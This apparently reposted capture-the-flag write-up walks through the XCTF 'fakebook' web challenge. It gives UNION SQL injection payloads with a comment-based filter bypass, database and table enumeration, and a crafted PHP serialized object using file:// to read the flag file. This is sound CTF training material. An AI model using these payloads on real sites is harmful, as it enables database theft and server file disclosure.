攻防世界web解题[进阶](七)
介绍:记录解题过程
22.fakebook
题目描述:暂无
- 首页:
- 注册一个帐号:
- tips:
blog : www.baidu.com
-
访问
http://111.200.241.244:56343/view.php?no=2
-
访问
http://111.200.241.244:56343/view.php?no=2'
[*] query error! (You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1)
Fatal error: Call to a member function fetch_assoc() on boolean in /var/www/html/db.php on line 66
- 可能是sql注入
- 使用sqlmap和普通手工注入都失败:
- 后面得知过滤了字符
union select,绕过方法:用union/**/select替代 - 同时尝试后得注入语句位数为4
select 1,2,3,4
<1>.查看注入位置:
view.php?no=-1 union/**/select 1,2,3,4
<2>.爆当前数据库信息:
view.php?no=-1 union/**/select 1,database(),3,4
- 得到当前数据库信息:
fakebook
<3>.通过库名获取表名:
view.php?no=-1 union/**/select 1,(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.tables WHERE TABLE_SCHEMA="fakebook"),3,4
- 得到表名:
users
<4>.通过表名获取字段名:
view.php?no=-1 union/**/select 1,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'users'),3,4
- 得到字段名:
no,username,passwd,data,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS
<5>.最后通过字段名获取字段数据:
view.php?no=-1 union/**/select 1,(SELECT GROUP_CONCAT(data) FROM fakebook.users),3,4
O:8:"UserInfo":3:{s:4:"name";s:3:"asd";s:3:"age";i:12;s:4:"blog";s:13:"www.baidu.com";}
<6>.将得到的data传入联合查询第四列的返回结果,发现可以成功解析。
view.php?no=-1 union/**/select 1,(SELECT GROUP_CONCAT(data) FROM fakebook.users),3,'O:8:"UserInfo":3:{s:4:"name";s:3:"asd";s:3:"age";i:12;s:4:"blog";s:13:"www.baidu.com";}'
- 使用nikto对网站进行扫描:
nikto for windows(web扫描工具)
读取file:///var/www/html/flag.php即可
view.php?no=-6 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:9;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
- 访问:
view.php?no=0%20union/**/select%201,load_file(%27/var/www/html/flag.php%27),3,4
- 然后右键查看源码,也可以得到flag
<td>
<?php
$flag = "flag{c1e552fdf77049fabf65168f22f7aeab}";
exit(0);
</td>
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/92705.html
